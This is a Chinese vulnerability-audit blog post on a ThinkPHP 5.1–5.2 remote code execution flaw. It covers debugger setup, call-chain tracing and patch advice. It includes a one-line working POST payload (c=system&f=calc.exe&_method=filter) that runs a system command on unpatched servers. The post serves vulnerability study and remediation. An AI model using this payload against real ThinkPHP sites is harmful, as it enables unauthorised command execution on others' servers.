thinkphp5+远程代码执行_Thinkphp5.1 ~ 5.2 全版本代码执行漏洞代码审计

0x01 简介

ThinkPHP是一个快速、简单的基于 MVC 和面向对象的轻量级 PHP 开发框架,遵循 Apache2 开源协议发布,一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,为 WEB 应用和 API 开发提供了强有力的支持。

之前放出来这个Thinkphp5.1~5.2全版本代码执行漏洞,这个漏洞在5.0.*部分版本中也适用。漏洞执行流程分为两个阶段,第一阶段为利用变量覆盖漏洞,第二阶段利用代码执行触发漏洞。

0x02 环境配置

需要的应用和环境:

1、Windows 10

2、phpStudy

3、phpStorm

4、XDebug

5、火狐浏览器

6、火狐浏览器插件-XDebug-ext

7、ThinkPHP 5.1.30

首先需要将phpStudy和phpStorm安装,安装成功后,phpStudy如图1所示,phpStorm如图2所示,请注意需要使用PHP5.6以上版本,不然运行ThinkPHP 5.1.30会报错。

9354c6c24b93ae47b32834b07f08eb6d.png

图1

6f4b96900dbc8137101a019c1495ff81.png

图2

XDebug 配置需要编辑php.ini,将配置替换如下,路径需要按照实际情况修改,访问PHPINFO,如果存在XDebug信息说明配置成功。如图3所示。

[XDebug]
xdebug.profiler_output_dir="D:phpStudytmpxdebug"
xdebug.trace_output_dir="D:phpStudytmpxdebug"
zend_extension="D:phpStudyPHPTutorialphpphp-5.6.27-ntsextphp_xdebug.dll"
xdebug.remote_enable=1 //是否允许远程终端 这里标示开启
xdebug.profiler_enable_trigger=0
xdebug.remote_handler=dbgp
xdebug.remote_mode=req
xdebug.remote_host=localhost
xdebug.remote_port=9000
xdebug.idekey=PHPSTORM

efddf1d91a7de4318e1fefa184203553.png

图3

然后需要配置phpStorm,选择File=>Settings=>php,选择好需要的PHP版本,如图4所示

4f791e27ad5de950ade56c827578cc2d.png

图4

选择File=>Settings=>Debug,配置好端口,端口需要和之前的配置文件对应,如图5所示。

8018fc8a84acc4aedc133c56d39a71a3.png

图5

选择File=>Settings=>Servers,配置如图6所示,Name需要和xdebug.idekey对应一致。

0216d40f537255d077bc6f8831c095e7.png

图6

接下来配置火狐浏览器,火狐浏览器用的版本如图7所示。

d828dbd00c83618a3d55d2e7fcbf55a3.png

图7

需要安装XDebug-ext,配置如图8所示。

7ec3ecf71fad5a8c4f1d88e7a8fec7a3.png

图8

最后将ThinkPHP 5.1.30的环境,拷贝到WWW目录中,如图9所示,配置完成。

b1d8143e1dcee31896a92a1246afb8fb.png

图9

0x03 代码审计

在火狐浏览器中使用POC,通过phpStrom跟踪执行流程。

POC如下:

(post)public/index.php
(data)c=system&f=calc.exe&_method=filter

找到变量覆漏洞,变量覆盖漏洞导致能控制$this->{$method},调用链如下:

Request.php:814, thinkRequest->method()
RuleGroup.php:151, thinkrouteRuleGroup->check()
Domain.php:76, thinkrouteDomain->check()
Route.php:885, thinkRoute->check()
App.php:604, thinkApp->routeCheck()
App.php:402, thinkApp->run()
index.php:21, {main}()

代码位置:thinkphp/library/think/Request.php 814行。如图10所示。

37f4e0b08a0f45edcb1be755a3dfe958.png

图10

找到变量覆盖漏洞触发后,执行流程会逐步返回App.php:435, thinkApp->run(),找到Middleware.php:130, thinkMiddleware->dispatch()跟着流程审计会找到执行call_user_func(“system”,”calc.exe”),调用链如下:

Request.php:1455, thinkRequest->filterValue()
Request.php:1370, array_walk_recursive()
Request.php:1370, thinkRequest->input()
Request.php:956, thinkRequest->param()
Module.php:121, thinkroutedispatchModule->thinkroutedispatch{closure}()
Middleware.php:185, call_user_func_array:{D:phpStudyPHPTutorialWWWthinkphp_5.1.30thinkphplibrarythinkMiddleware.php:185}()
Middleware.php:185, thinkMiddleware->think{closure}()
Middleware.php:130, call_user_func:{D:phpStudyPHPTutorialWWWthinkphp_5.1.30thinkphplibrarythinkMiddleware.php:130}()
Middleware.php:130, thinkMiddleware->dispatch()
Module.php:140, thinkroutedispatchModule->exec()
Dispatch.php:168, thinkrouteDispatch->run()
App.php:432, thinkApp->think{closure}()
Middleware.php:185, call_user_func_array:{D:phpStudyPHPTutorialWWWthinkphp_5.1.30thinkphplibrarythinkMiddleware.php:185}()
Middleware.php:185, thinkMiddleware->think{closure}()
Middleware.php:130, call_user_func:{D:phpStudyPHPTutorialWWWthinkphp_5.1.30thinkphplibrarythinkMiddleware.php:130}()
Middleware.php:130, thinkMiddleware->dispatch()
App.php:435, thinkApp->run()
index.php:21, {main}()

代码位置:thinkphp/library/think/Request.php 1455行,如图11所示。

8064a89e512516c4a920d887fe51932a.png

图11

通过放出的POC进行复现,漏洞复现结果,如图12所示。

12fb9f4a49fbef5ed523f426c1f8fa25.png

图12

0x04 修复建议

1.利用Composer 或官网更新至最新版本。

2.如果不能及时更新,建议参考最新版本的Request类的method方法进行手工修复。

作者:Topsec-SRC

欢迎来安全脉搏查看更多的干货文章和我们一起交流互动哦!

脉搏地址:安全脉搏 | 分享技术,悦享品质

微博地址:Sina Visitor System

【注:安全脉搏所有文章未经许可,谢绝转载】

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值